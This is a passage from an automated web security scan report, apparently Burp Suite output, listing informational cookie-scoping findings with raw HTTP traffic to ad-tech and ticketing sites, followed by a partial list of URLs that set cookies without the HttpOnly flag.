tpro=eJx9kcFuhSAQRf9l1uQFRFHeb3T50hCCqCQKBrRJY%2Fz3Mhjbt%2Bpuzs3MnblwwBrD4GYLzwNG63sbsVo0KvTRCAKDvamuTwJ6LL1csQo1ygiwDG0BnqFTvEbgFQHeqFqWUQINVeu8J6QKjaI2xcno3aAou2w%2BRKWX21cnp30GApNL662GbcIjabYwk5v7aD3a%2BIANbUPg215LmtzhvAlLWUMVpyhnB06VKHUlCQiqGC3EMQp9u1LiijDP9orsg7%2BeoXmTM7YExqh7lcxUbuzOPJfchme8jlLBEz7WELcEOdUGT8ZpK0UlK3GS%2Fzp4zcX5%2BZs5f8zmMM7fPIEl9MqE3eMQgS8bkwv5RYA9KJznD5YChcM%3D; expires=Tue, 12-Jun-2012 11:10:36 GMT; path=/; domain=.lijit.com
ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:10:36 GMT; path=/; domain=.lijit.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /beacon?viewId=1307962923471503c3265a8b0&rand=1307962923471&uri=http://www.lijit.com/users/sbnation&informer=7182163&type=fpads&loc=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&rr=&ifr=0&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:10:36 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n36 ( iad-agg-n25), ms iad-agg-n25 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 13 Jun 2011 11:10:36 GMT
Content-Length: 69
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=deleted; expires=Sun, 13-Jun-2010 11:10:35 GMT; path=/; domain=.lijit.com
Set-Cookie: tpro=eJx9kcFuhSAQRf9l1uQFRFHeb3T50hCCqCQKBrRJY%2Fz3Mhjbt%2Bpuzs3MnblwwBrD4GYLzwNG63sbsVo0KvTRCAKDvamuTwJ6LL1csQo1ygiwDG0BnqFTvEbgFQHeqFqWUQINVeu8J6QKjaI2xcno3aAou2w%2BRKWX21cnp30GApNL662GbcIjabYwk5v7aD3a%2BIANbUPg215LmtzhvAlLWUMVpyhnB06VKHUlCQiqGC3EMQp9u1LiijDP9orsg7%2BeoXmTM7YExqh7lcxUbuzOPJfchme8jlLBEz7WELcEOdUGT8ZpK0UlK3GS%2Fzp4zcX5%2BZs5f8zmMM7fPIEl9MqE3eMQgS8bkwv5RYA9KJznD5YChcM%3D; expires=Tue, 12-Jun-2012 11:10:36 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:10:36 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
           </body>
</html>

12.164. http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tiqiq.com
Path:	/Tiqiq/PublisherHomePage.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TiqiqUser=82198505; domain=.tiqiq.com; expires=Sun, 13-Jun-2021 11:21:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Tiqiq/PublisherHomePage.aspx?PerformerIds=513;InclAwayGames&PublisherID=1011031&BrandID=Empty&EventCount=5 HTTP/1.1
Host: www.tiqiq.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/mavericks-tickets
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: TiqiqUser=82198505; domain=.tiqiq.com; expires=Sun, 13-Jun-2021 11:21:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 13 Jun 2011 11:21:22 GMT
Content-Length: 21246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
TiqIQ Tic
...[SNIP]...

12.165. http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tiqiq.com
Path:	/WebServices/EventsData.asmx/LogUserAction

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TiqiqUser=82198505; domain=.tiqiq.com; expires=Sun, 13-Jun-2021 11:21:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /WebServices/EventsData.asmx/LogUserAction HTTP/1.1
Host: www.tiqiq.com
Proxy-Connection: keep-alive
Referer: http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx?PerformerIds=513;InclAwayGames&PublisherID=1011031&BrandID=Empty&EventCount=5
Content-Length: 301
Origin: http://www.tiqiq.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TiqiqSession=185319668; TiqiqUser=82198505; __utmz=1.1307963654.1.1.utmcsr=mavs|utmccn=link|utmcmd=affiliate|utmctr=mavericks-tickets; __utmv=; __utma=1.1315576825.1307963654.1307963654.1307963654.1; __utmc=1; __utmb=1.1.10.1307963654; mp_super_properties=%7B%22all%22%3A%20%7B%22distinct_id%22%3A%20%22185319668%22%2C%22medium%22%3A%20%22affiliate%22%2C%22affiliate%22%3A%20true%2C%22publisher%22%3A%20%22mavs%22%2C%22campaign%22%3A%20%22link%22%2C%22keyword%22%3A%20%22mavericks-tickets%22%2C%22widget%20template%22%3A%20%22%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D

{"Category":"Impression","Action":"Enter","Screen":"PubUI","WidgetID":0,"PublisherID":"1011031","EventID":0,"ListingID":0,"SampleID":0,"Quantity":-1,"Price":-1,"Referrer":"http://www.tiqiq.com/Tiqiq/P
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: TiqiqUser=82198505; domain=.tiqiq.com; expires=Sun, 13-Jun-2021 11:21:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 13 Jun 2011 11:21:25 GMT
Content-Length: 10

{"d":true}

12.166. http://www.wtp101.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/admeld_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Wed, 12 Jun 2013 11:21:52 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:21:52 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=485&external_user_id=73b6b0a9-a657-4959-8c44-a72cc1d5226b
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Wed, 12 Jun 2013 11:21:52 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

12.167. http://www.wtp101.com/cox_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/cox_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Wed, 12 Jun 2013 11:02:48 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cox_sync?publisher_dsp_id=8 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:02:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Wed, 12 Jun 2013 11:02:48 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

12.168. http://www22.glam.com/cTagsImgCmd.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.glam.com
Path:	/cTagsImgCmd.act

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771; expires=Wed, 15 Jun 2011 11:02:51 GMT; path=/; domain=.glam.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=qcsegs&gvalue=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771 HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^a933bb3529ca1ea252e336d1da945607^115232130551023312111^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^87313079629718721^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^qcsegs-D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771
Set-Cookie: qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771; expires=Wed, 15 Jun 2011 11:02:51 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=897
Date: Mon, 13 Jun 2011 11:02:51 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13. Cookie without HttpOnly flag set previous next
There are 206 instances of this issue:

http://ads.adxpose.com/ads/ads.js
http://dg.specificclick.net/
http://event.adxpose.com/event.flow
http://fansided.com/category/nba
http://idolator.com/favicon.ico
http://kotaku.com/
http://kotaku.com/index.php
http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information
http://www.nba.com/mavericks/index_main.html
http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif
http://www.ugo.com/takeover/takeover.html
http://www.ugo.com/takeover/takeover.js
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://ad.afy11.net/ad
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13
http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23
http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2
http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7
http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34
http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10
http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11
http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7
http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4
http://ad.doubleclick.net/adj/buz.idolator/content
http://ad.doubleclick.net/adj/cm.mtv/ent_010111
http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
http://ad.doubleclick.net/adj/oiq.rmx/
http://ad.doubleclick.net/click
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/pixel.htm
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/imp
http://ad.yieldmanager.com/imp
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/unpixel
http://admeld.lucidmedia.com/clicksense/admeld/match
http://adopt.imiclk.com/emb/q
http://ads.ad4game.com/www/delivery/ajs.php
http://ads.adbrite.com/adserver/vdi/742697
http://ads.cpxadroit.com/adserver/10-1TZ6SMYM9UGQB.cpxad
http://ads.gamershell.com/delivery/al.php
http://ads.gamershell.com/www/delivery/ajs.php
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992
http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.revsci.net/adserver/ako
http://ads.undertone.com/f
http://ak1.abmr.net/is/adopt.imiclk.com
http://ak1.abmr.net/is/tag.admeld.com
http://ak1.abmr.net/is/www.burstnet.com
http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1
http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11
http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php
http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php
http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php
http://api.bizographics.com/v1/profile.redirect
http://api.twitter.com/1/FanSided/lists//statuses.json
http://apr.lijit.com///www/delivery/ajs.php
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://b.voicefive.com/p
http://beacon.dmsinsights.com/beacon/1103771/2
http://bh.contextweb.com/bh/rtset
http://bpx.a9.com/ads/getad
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://btg.mtvnservices.com/aria/guid.html
http://ce.lijit.com/merge
http://cm.npc-lee.overture.com/js_1_0/
http://csc.beap.ad.yieldmanager.net/i
http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM
http://d.adroll.com/view/7e0e346171a4d3507190678e09366eb4
http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830
http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830
http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.chango.com/collector/admeldpixel
http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830
http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000
http://d.xp1.ru4.com/meta
http://d.xp1.ru4.com/meta
http://d1.openx.org/lg.php
http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js
http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js
http://d7.zedo.com/img/bh.gif
http://gdyn.nba.com/1.1/1.gif
http://glam.grapeshot.co.uk/main/redirect.cgi
http://image2.pubmatic.com/AdServer/Pug
http://img137.imageshack.us/img137/4291/d5zee1.jpg
http://img690.imageshack.us/img690/7868/umadbroz.jpg
http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png
http://imp.constantcontact.com/imp/cmp.jsp
http://js.revsci.net/gateway/gw.js
http://load.exelator.com/load/
http://m.xp1.ru4.com/meta
http://media.fastclick.net/w/tre
http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif
http://my.yahoo.com/e/df
http://my.yahoo.com/e/js
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1
http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js
http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js
http://ox-d.sbnation.com/w/1.0/ajs
http://p.brilig.com/contact/bct
http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js
http://pix04.revsci.net/D10889/a1/0/3/0.gif
http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js
http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js
http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js
http://pix04.revsci.net/E06560/b3/0/3/noscript.gif
http://pix04.revsci.net/G07610/b3/0/3/noscript.gif
http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js
http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js
http://pixel.invitemedia.com/data_sync
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
http://pixel.rubiconproject.com/di.php
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://r.turn.com/r/bd
http://r.turn.com/r/beacon
http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/
http://rs.gwallet.com/r1/pixel/x420r9190030
http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583
http://segments.adap.tv/data/
http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221
http://server.cpmstar.com/brilig.aspx
http://services.krxd.net/geoip
http://services.krxd.net/pixel.gif
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://sis.amazon.com/iu
http://srv.clickfuse.com/pixels/delete.php
http://stgapi.choicestream.com/instr/csanywhere.js
http://sync.adap.tv/sync
http://sync.mathtag.com/sync
http://syndication.mmismm.com/tntwo.php
http://t.invitemedia.com/track_imp
http://tag.admeld.com/ad/js/195/fsv/728x90/ros
http://tags.bluekai.com/site/2312
